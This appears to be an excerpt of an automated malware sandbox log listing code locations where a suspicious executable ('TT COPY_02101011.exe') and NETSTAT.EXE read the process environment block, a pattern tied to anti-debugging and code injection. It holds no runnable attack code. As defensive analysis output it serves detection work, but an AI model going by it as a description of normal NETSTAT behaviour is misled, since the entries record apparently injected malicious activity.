Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 1_2_00B4FE3F mov eax, dword ptr fs:[00000030h]	1_2_00B4FE3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D131B mov eax, dword ptr fs:[00000030h]	9_2_032D131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321DB60 mov ecx, dword ptr fs:[00000030h]	9_2_0321DB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03243B7A mov eax, dword ptr fs:[00000030h]	9_2_03243B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03243B7A mov eax, dword ptr fs:[00000030h]	9_2_03243B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321DB40 mov eax, dword ptr fs:[00000030h]	9_2_0321DB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E8B58 mov eax, dword ptr fs:[00000030h]	9_2_032E8B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321F358 mov eax, dword ptr fs:[00000030h]	9_2_0321F358
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03244BAD mov eax, dword ptr fs:[00000030h]	9_2_03244BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03244BAD mov eax, dword ptr fs:[00000030h]	9_2_03244BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03244BAD mov eax, dword ptr fs:[00000030h]	9_2_03244BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E5BA5 mov eax, dword ptr fs:[00000030h]	9_2_032E5BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D138A mov eax, dword ptr fs:[00000030h]	9_2_032D138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032CD380 mov ecx, dword ptr fs:[00000030h]	9_2_032CD380
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03221B8F mov eax, dword ptr fs:[00000030h]	9_2_03221B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03221B8F mov eax, dword ptr fs:[00000030h]	9_2_03221B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03242397 mov eax, dword ptr fs:[00000030h]	9_2_03242397
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324B390 mov eax, dword ptr fs:[00000030h]	9_2_0324B390
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]	9_2_032403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]	9_2_032403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]	9_2_032403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]	9_2_032403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]	9_2_032403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032403E2 mov eax, dword ptr fs:[00000030h]	9_2_032403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323DBE9 mov eax, dword ptr fs:[00000030h]	9_2_0323DBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032953CA mov eax, dword ptr fs:[00000030h]	9_2_032953CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032953CA mov eax, dword ptr fs:[00000030h]	9_2_032953CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03254A2C mov eax, dword ptr fs:[00000030h]	9_2_03254A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03254A2C mov eax, dword ptr fs:[00000030h]	9_2_03254A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03228A0A mov eax, dword ptr fs:[00000030h]	9_2_03228A0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03215210 mov eax, dword ptr fs:[00000030h]	9_2_03215210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03215210 mov ecx, dword ptr fs:[00000030h]	9_2_03215210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03215210 mov eax, dword ptr fs:[00000030h]	9_2_03215210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03215210 mov eax, dword ptr fs:[00000030h]	9_2_03215210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321AA16 mov eax, dword ptr fs:[00000030h]	9_2_0321AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321AA16 mov eax, dword ptr fs:[00000030h]	9_2_0321AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DAA16 mov eax, dword ptr fs:[00000030h]	9_2_032DAA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DAA16 mov eax, dword ptr fs:[00000030h]	9_2_032DAA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03233A1C mov eax, dword ptr fs:[00000030h]	9_2_03233A1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032CB260 mov eax, dword ptr fs:[00000030h]	9_2_032CB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032CB260 mov eax, dword ptr fs:[00000030h]	9_2_032CB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E8A62 mov eax, dword ptr fs:[00000030h]	9_2_032E8A62
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0325927A mov eax, dword ptr fs:[00000030h]	9_2_0325927A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]	9_2_03219240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]	9_2_03219240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]	9_2_03219240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03219240 mov eax, dword ptr fs:[00000030h]	9_2_03219240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DEA55 mov eax, dword ptr fs:[00000030h]	9_2_032DEA55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032A4257 mov eax, dword ptr fs:[00000030h]	9_2_032A4257
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]	9_2_032152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]	9_2_032152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]	9_2_032152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]	9_2_032152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032152A5 mov eax, dword ptr fs:[00000030h]	9_2_032152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0322AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0322AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324FAB0 mov eax, dword ptr fs:[00000030h]	9_2_0324FAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324D294 mov eax, dword ptr fs:[00000030h]	9_2_0324D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324D294 mov eax, dword ptr fs:[00000030h]	9_2_0324D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03242AE4 mov eax, dword ptr fs:[00000030h]	9_2_03242AE4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03242ACB mov eax, dword ptr fs:[00000030h]	9_2_03242ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]	9_2_03234120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]	9_2_03234120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]	9_2_03234120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03234120 mov eax, dword ptr fs:[00000030h]	9_2_03234120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03234120 mov ecx, dword ptr fs:[00000030h]	9_2_03234120
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324513A mov eax, dword ptr fs:[00000030h]	9_2_0324513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324513A mov eax, dword ptr fs:[00000030h]	9_2_0324513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03219100 mov eax, dword ptr fs:[00000030h]	9_2_03219100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03219100 mov eax, dword ptr fs:[00000030h]	9_2_03219100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03219100 mov eax, dword ptr fs:[00000030h]	9_2_03219100
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321C962 mov eax, dword ptr fs:[00000030h]	9_2_0321C962
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321B171 mov eax, dword ptr fs:[00000030h]	9_2_0321B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321B171 mov eax, dword ptr fs:[00000030h]	9_2_0321B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323B944 mov eax, dword ptr fs:[00000030h]	9_2_0323B944
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323B944 mov eax, dword ptr fs:[00000030h]	9_2_0323B944
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032461A0 mov eax, dword ptr fs:[00000030h]	9_2_032461A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032461A0 mov eax, dword ptr fs:[00000030h]	9_2_032461A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]	9_2_032D49A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]	9_2_032D49A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]	9_2_032D49A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D49A4 mov eax, dword ptr fs:[00000030h]	9_2_032D49A4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032969A6 mov eax, dword ptr fs:[00000030h]	9_2_032969A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]	9_2_032951BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]	9_2_032951BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]	9_2_032951BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032951BE mov eax, dword ptr fs:[00000030h]	9_2_032951BE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323C182 mov eax, dword ptr fs:[00000030h]	9_2_0323C182
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324A185 mov eax, dword ptr fs:[00000030h]	9_2_0324A185
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03242990 mov eax, dword ptr fs:[00000030h]	9_2_03242990
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0321B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0321B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0321B1E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032A41E8 mov eax, dword ptr fs:[00000030h]	9_2_032A41E8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]	9_2_0322B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]	9_2_0322B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]	9_2_0322B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322B02A mov eax, dword ptr fs:[00000030h]	9_2_0322B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]	9_2_0324002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]	9_2_0324002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]	9_2_0324002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]	9_2_0324002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324002D mov eax, dword ptr fs:[00000030h]	9_2_0324002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E4015 mov eax, dword ptr fs:[00000030h]	9_2_032E4015
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E4015 mov eax, dword ptr fs:[00000030h]	9_2_032E4015
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03297016 mov eax, dword ptr fs:[00000030h]	9_2_03297016
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03297016 mov eax, dword ptr fs:[00000030h]	9_2_03297016
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03297016 mov eax, dword ptr fs:[00000030h]	9_2_03297016
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E1074 mov eax, dword ptr fs:[00000030h]	9_2_032E1074
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D2073 mov eax, dword ptr fs:[00000030h]	9_2_032D2073
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03230050 mov eax, dword ptr fs:[00000030h]	9_2_03230050
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03230050 mov eax, dword ptr fs:[00000030h]	9_2_03230050
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]	9_2_032420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]	9_2_032420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]	9_2_032420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]	9_2_032420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]	9_2_032420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032420A0 mov eax, dword ptr fs:[00000030h]	9_2_032420A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032590AF mov eax, dword ptr fs:[00000030h]	9_2_032590AF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324F0BF mov ecx, dword ptr fs:[00000030h]	9_2_0324F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324F0BF mov eax, dword ptr fs:[00000030h]	9_2_0324F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324F0BF mov eax, dword ptr fs:[00000030h]	9_2_0324F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03219080 mov eax, dword ptr fs:[00000030h]	9_2_03219080
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03293884 mov eax, dword ptr fs:[00000030h]	9_2_03293884
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03293884 mov eax, dword ptr fs:[00000030h]	9_2_03293884
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]	9_2_032140E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]	9_2_032140E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032140E1 mov eax, dword ptr fs:[00000030h]	9_2_032140E1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032158EC mov eax, dword ptr fs:[00000030h]	9_2_032158EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]	9_2_032AB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AB8D0 mov ecx, dword ptr fs:[00000030h]	9_2_032AB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]	9_2_032AB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]	9_2_032AB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]	9_2_032AB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AB8D0 mov eax, dword ptr fs:[00000030h]	9_2_032AB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03214F2E mov eax, dword ptr fs:[00000030h]	9_2_03214F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03214F2E mov eax, dword ptr fs:[00000030h]	9_2_03214F2E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324E730 mov eax, dword ptr fs:[00000030h]	9_2_0324E730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E070D mov eax, dword ptr fs:[00000030h]	9_2_032E070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E070D mov eax, dword ptr fs:[00000030h]	9_2_032E070D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324A70E mov eax, dword ptr fs:[00000030h]	9_2_0324A70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324A70E mov eax, dword ptr fs:[00000030h]	9_2_0324A70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323F716 mov eax, dword ptr fs:[00000030h]	9_2_0323F716
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AFF10 mov eax, dword ptr fs:[00000030h]	9_2_032AFF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AFF10 mov eax, dword ptr fs:[00000030h]	9_2_032AFF10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322FF60 mov eax, dword ptr fs:[00000030h]	9_2_0322FF60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E8F6A mov eax, dword ptr fs:[00000030h]	9_2_032E8F6A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322EF40 mov eax, dword ptr fs:[00000030h]	9_2_0322EF40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03228794 mov eax, dword ptr fs:[00000030h]	9_2_03228794
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03297794 mov eax, dword ptr fs:[00000030h]	9_2_03297794
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03297794 mov eax, dword ptr fs:[00000030h]	9_2_03297794
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03297794 mov eax, dword ptr fs:[00000030h]	9_2_03297794
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032537F5 mov eax, dword ptr fs:[00000030h]	9_2_032537F5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321E620 mov eax, dword ptr fs:[00000030h]	9_2_0321E620
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032CFE3F mov eax, dword ptr fs:[00000030h]	9_2_032CFE3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h]	9_2_0321C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h]	9_2_0321C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h]	9_2_0321C600
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03248E00 mov eax, dword ptr fs:[00000030h]	9_2_03248E00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032D1608 mov eax, dword ptr fs:[00000030h]	9_2_032D1608
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324A61C mov eax, dword ptr fs:[00000030h]	9_2_0324A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0324A61C mov eax, dword ptr fs:[00000030h]	9_2_0324A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0322766D mov eax, dword ptr fs:[00000030h]	9_2_0322766D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]	9_2_0323AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]	9_2_0323AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]	9_2_0323AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]	9_2_0323AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]	9_2_0323AE73
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]	9_2_03227E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]	9_2_03227E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]	9_2_03227E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]	9_2_03227E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]	9_2_03227E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]	9_2_03227E41
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DAE44 mov eax, dword ptr fs:[00000030h]	9_2_032DAE44
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DAE44 mov eax, dword ptr fs:[00000030h]	9_2_032DAE44
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h]	9_2_032E0EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h]	9_2_032E0EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h]	9_2_032E0EA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032946A7 mov eax, dword ptr fs:[00000030h]	9_2_032946A7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032AFE87 mov eax, dword ptr fs:[00000030h]	9_2_032AFE87
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032276E2 mov eax, dword ptr fs:[00000030h]	9_2_032276E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032416E0 mov ecx, dword ptr fs:[00000030h]	9_2_032416E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03258EC7 mov eax, dword ptr fs:[00000030h]	9_2_03258EC7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032436CC mov eax, dword ptr fs:[00000030h]	9_2_032436CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032CFEC0 mov eax, dword ptr fs:[00000030h]	9_2_032CFEC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E8ED6 mov eax, dword ptr fs:[00000030h]	9_2_032E8ED6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0321AD30 mov eax, dword ptr fs:[00000030h]	9_2_0321AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032DE539 mov eax, dword ptr fs:[00000030h]	9_2_032DE539
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]	9_2_03223D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_032E8D34 mov eax, dword ptr fs:[00000030h]	9_2_032E8D34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0329A537 mov eax, dword ptr fs:[00000030h]	9_2_0329A537
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h]	9_2_03244D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h]	9_2_03244D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h]	9_2_03244D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323C577 mov eax, dword ptr fs:[00000030h]	9_2_0323C577
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 9_2_0323C577 mov eax, dword ptr fs:[00000030h]	9_2_0323C577
